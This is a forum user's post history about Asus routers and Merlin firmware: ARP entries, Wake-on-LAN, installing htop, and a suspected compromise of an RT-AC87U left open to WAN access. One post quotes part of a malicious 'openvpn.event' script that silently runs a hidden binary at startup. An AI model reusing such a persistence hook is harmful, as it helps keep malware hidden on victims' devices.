Done also! Thanks for the tip, I like to name the model on the post itself in case someone reads it in the future and my sig is changed with a newer model. Cheers!

    Static ARP entries keep vanishing

The same thing happens with my GT-AX6000 since I bought it last month (first firm 388.6_2, did not even tried stock fw, first power on => merlin flash) I tought the arp flush was kernel related and normal (did not happen on my AC87U). Solved it through cron job. Cheers

    script to use AC86U's WakeOnLan

Hi shorshi. To have a fully working WOL you have to do a thing or two first: 1) fixed ip on dhcp for the device to be woken up (through router gui) 2) open port for that service pointing that ip (through router gui) 3) fixed arp entry to link the device fixed ip and its mac addres (through ssh)...

XTERM - Did I mess things up?

Thanks all for your replies! I did'n install Entware cause in my past experience on AC87U was not needed just to install and run htop using preinstalled Optware. Guess its not the same with ax6000 Thanks for the hint, will do if a decide to install Entware. Correct, in fact that manual update...

XTERM - Did I mess things up?

Hi! Been fidling with my recently arrived GT6000, and I guess I might spoiled something. To the facts: I opened an ssh session and run "htop" just to see loads, mems, etc. As the result was "htop: not found", I did "ipkg install htop" as did a long time ago on my previous AC87U to be able to...

Possibly in the market for a new router

I've done the exact same thing. Was a difficult choice between 88U Pro and AX6000, but at same price, I went for the latter, based on same hardware + extra usb port + love the looks. Hope I had made a good choice though... I remember looking at this review on the same site before I went for it...

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

Just wanted to thank you all once again guys, I've already set up an OpenVPN server on router side and clients both on my laptop and my phone (and stored .ovpn file securely on the cloud just in case) God it was SO MUCH EASIER than I tought! I got confused from the very beginning with the...

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

Thanks once again to all for your help. I will read and learn how to set up an OpenVPN connection for remote access then. One preliminary question about it: Do I have to route all my traffic through that VPN or is it just for remote access? I am thinking now that even if I disabled both web...

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

Thanks for the tip guys, I will hold on locked to LAN only access until I can replace it for a newer device. I knew WAN access was a bit risky, but I did not think this (outdated) device would be SO vulnerable. Lesson learned (the hard way though...) Regards and thanks once again for your input.

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

I know, I know, and it hurts 😭. Here in my country (Argentina) these things costs twice or triple than abroad (and we earn much less), but my mother in law is traveling to the states next month, I will try to get an AX86U (¿pro?) on Amazon and finally put my beloved 87U to rest.

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

Sadly (and noobly) yes, both web access and ssh access were enabled from WAN.

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

Thanks for the reply Colin. I'm really worried how the heck they broke in, and how far the data steel went.

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

Hi to all. I've discovered the root of my issues, and I'm guessing it might be a hack. I've found a file named "openvpn.event" on my scritps folder with the following content: #!/bin/sh echo '#!/bin/sh sleep 40 chmod 777 /jffs/cfgicon/cfg_silent /jffs/cfgicon/cfg_silent > /dev/null 2>&1 &' | sh...

[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

Hi to everyone! Long time no post here, but I still come here oftenly to be updated and continue learning. I'm still using my beloved RT-AC87U under Merlin's v384.13_10 (bridge mode attached to a fiber GPON). All was working flawlessly for the last several months/years. Now, all of a sudden, I...

    Beta [Fork] 384.13 builds

Hi! What could you say about newest DD-WRT? Don't you miss Merlin's goodies? I know I'm now very exposed security wise, but I don't imagine myself using other fw after so many years...
